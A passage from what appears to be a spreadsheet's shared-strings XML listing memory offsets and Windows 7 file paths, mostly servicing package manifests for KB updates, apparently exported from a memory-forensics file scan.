  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2620704~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde988300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3139914_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9883b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2620704_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9887a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2620704~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde988b88</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2620704_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9893c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2654428~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9896f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3139914~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9897b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2631813~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde989b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2631813~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde989f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2620704~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98a300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2667402~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98a6e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2667402_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98aa18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_37_for_KB3138612~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98aad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2667402~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98af80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2654428~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98b2a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_74_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98b360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB2667402~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98b748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2667402~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98bb30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2667402_RTM~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98be60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_42_for_KB3147071~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98bf18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2667402~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98c298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2690533~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98c680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2685939~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98ca68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2685939_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98cf18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2685939~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98d1e0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_75_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98d298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2698365~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98d680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_13_for_KB2698365~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98d970</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\mofd.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98da68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_12_for_KB2698365~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98dd98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_74_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98de50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2690533~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98e1d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_147_for_KB2758857~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98e500</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_76_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98e5b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2705219~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98e9a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2705219~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98ee50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2698365~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98f300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2770660~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98f6e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2770660_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98fa18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_77_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98fad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2770660~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde98feb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB2758857~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde990298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2807986~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde990680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB2807986~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde990a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2770660~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde990e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3139914~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde990f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2770660_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde991038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3109560~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde991298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2506928_RTM~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9915c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB3110329~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde991680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2506928~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde991a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2506928_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde991e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2506928~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9921d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2563227~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde992500</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB3124275~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9925b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2545698~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9929a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_10_for_KB2545698~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde992d98</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility</t>
  </si>
  <si>
    <t>\Magnify.lnk_x001B_</t>
  </si>
  <si>
    <t>0xde992e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2506928~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde993200</t>
  </si>
  <si>
    <t>0xde9935e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2640148~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde993918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB3102429~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9939d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2640148~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde993db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2563227~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde994038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_125_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9940f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_126_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde994468</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3109103~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde994520</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2660075_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde994850</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_42_for_KB3126587~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde994908</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2660075~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde994db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2660075_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde995038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2660075~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde995360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3108371_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde995480</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_8_for_KB2729094~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K_x001B_[104</t>
  </si>
  <si>
    <t>0xde995868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB2726535~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde995b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3108371~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde995c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_149_for_KB2726535~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde996038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2729094~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9963b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2972211~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9966e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3108371~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9967a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_6_for_KB2761217~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde996c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2761217~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde996f80</t>
  </si>
  <si>
    <t>\Program Files\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9973c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2968294~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde997690</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3108664_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9977b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2985461~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde997b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_55_for_KB2894844~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde997ec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3108664~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde997f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2894844~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde998248</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3107998~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde998300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2972100~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9986e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2968294~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde998ae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3108664~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde998b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2968294~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde998f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2968294_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde999240</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3092601~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde999360</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde999748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2977292~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde999a78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3101722~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde999b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2977292_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde999e60</t>
  </si>
  <si>
    <t>\Windows\System32\linkinfo.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde999f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2977292~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99a298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_150_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99a5c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3108381~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99a680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_74_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99a878</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB3075220~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99ab30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_73_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99ae60</t>
  </si>
  <si>
    <t>\Windows\Fonts\times.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99af18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_72_for_KB2984972~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99b1e0</t>
  </si>
  <si>
    <t>0xde99b298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2991963~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99b560</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3109103_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99b680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_59_for_KB2992611~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99ba68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_58_for_KB2992611~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99bd98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3109103~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99be50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB2992611~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99c1d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3010788_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99c500</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3086255_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99c5b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3010788~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99ca68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2991963~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99ce50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2991963_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99d300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_57_for_KB3003743~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99d5c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB3080079~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99d6e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB3003743~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99dad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2978120~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99de00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3086255~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99deb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3010788~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99e298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_57_for_KB3011780~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99e680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB3011780~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99ea78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_71_for_KB3080079~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99eb30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_59_for_KB3003743~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99ef18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_58_for_KB3003743~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99f038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_72_for_KB3080079~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99f298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3019978~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99f680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3019978_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99f948</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_73_for_KB3080079~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99fa68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3019978~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde99fe50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_58_for_KB3011780~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a01d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB3021917~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a05b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3021917~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a07b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3075220~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a09b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a0a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3021674~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a0e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3022777~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a1038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_70_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a1200</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_72_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a15e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_71_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a18b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_71_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a19d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_70_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a1db8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9a2520</t>
  </si>
  <si>
